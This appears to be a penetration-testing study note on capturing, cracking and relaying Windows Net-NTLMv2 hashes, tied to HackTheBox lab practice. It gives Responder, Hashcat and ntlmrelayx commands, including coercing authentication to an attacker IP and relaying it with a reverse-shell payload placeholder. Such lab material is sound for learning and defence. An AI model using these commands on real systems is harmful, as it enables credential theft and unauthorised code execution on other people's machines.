Net-NTLMv2

Two Different Things, One Name

This is the single biggest point of confusion in Windows credential attacks, so let’s kill it up front.

There are two completely different things both called “NTLM”:

They sound identical and behave nothing alike. The previous note was about the stored hash. This note is about the network one. Keep them separate and everything else clicks.

The Unprivileged Scenario

Pass-the-Hash needed admin and SYSTEM to read the SAM. Here you have neither: just a foothold as a low-privileged user. No Mimikatz, no SAM.

But you can still make a Windows machine authenticate to you, and capture the network response it produces.

How the Capture Works

Windows network authentication is a challenge-response:

1. The client says “I want to connect”
2. The server sends a random challenge (a nonce)
3. The client encrypts that challenge with its NTLM hash → the Net-NTLMv2 response
4. The server checks it

If you are the server, step 3 lands in your lap.

The tool is Responder, a fake SMB server that captures these responses (it also poisons LLMNR/NBT-NS/MDNS, but here we just need it listening):

sudo responder -I eth0

Then you coerce the victim into authenticating to you. From a shell you control, simply reach for a share on your box:

dir \\10.10.10.5\share

Windows tries to connect and authenticates on the way, handing Responder a Net-NTLMv2 hash. No shell? Other coercion works too, e.g. a web form that accepts a UNC path like \\10.10.10.5\x.

Why You Can’t Pass This One

A Net-NTLMv2 response is the answer to one specific random challenge. Replay it against a different server and its challenge won’t match, so the response is worthless. That’s why there’s no “pass-the-Net-NTLMv2-hash”. The static NTLM hash you can pass; this one-time response you cannot.

Two Options: Crack or Relay

Since you can’t pass it, a captured Net-NTLMv2 hash leaves you exactly two moves.

Crack It

If the password might be weak, throw it at Hashcat, mode 5600:

hashcat -m 5600 captured.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule

Crack it, and now you have a plaintext password to reuse anywhere.

Relay It

But what if the password is long and random? You’ll never crack it. So don’t try. Forward it instead.

The insight: a response is only valid for one challenge-response exchange, so don’t save it for later, pass it along live to a different machine as it happens:

1. You coerce the victim to authenticate to you
2. At the same instant, you open a connection to a second machine (the real target)
3. The second machine sends its challenge, you forward it to the victim
4. The victim’s valid response comes back, you forward it to the second machine
5. The second machine sees a legitimate login, as the victim

You’re a man-in-the-middle on the authentication itself. The tool is ntlmrelayx:

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.10.20 -c "<base64 reverse shell>"

If the victim is a local admin on that second machine, the relayed login gives you code execution there.

Crack for a weak password, relay for a strong one. And the same UAC remote restriction caveat from Pass-the-Hash applies: for code execution, the relayed user generally needs to be the built-in Administrator unless remote restrictions are off.

Local, Network… What About Domain?

You can now attack the stored local hash (Pass-the-Hash) and the network hash (capture, crack, relay). Both have been about local accounts.

But enterprises run on domain accounts, and those hashes live somewhere else entirely: in memory. They’re easy to grab… until Microsoft’s newest defense gets in the way. That’s the final note.

Practice Boxes

• Responder - HackTheBox Starting Point (Tier 1). Coerce a victim into authenticating to Responder, capture the Net-NTLMv2 hash, crack it, and log in. This note start to finish.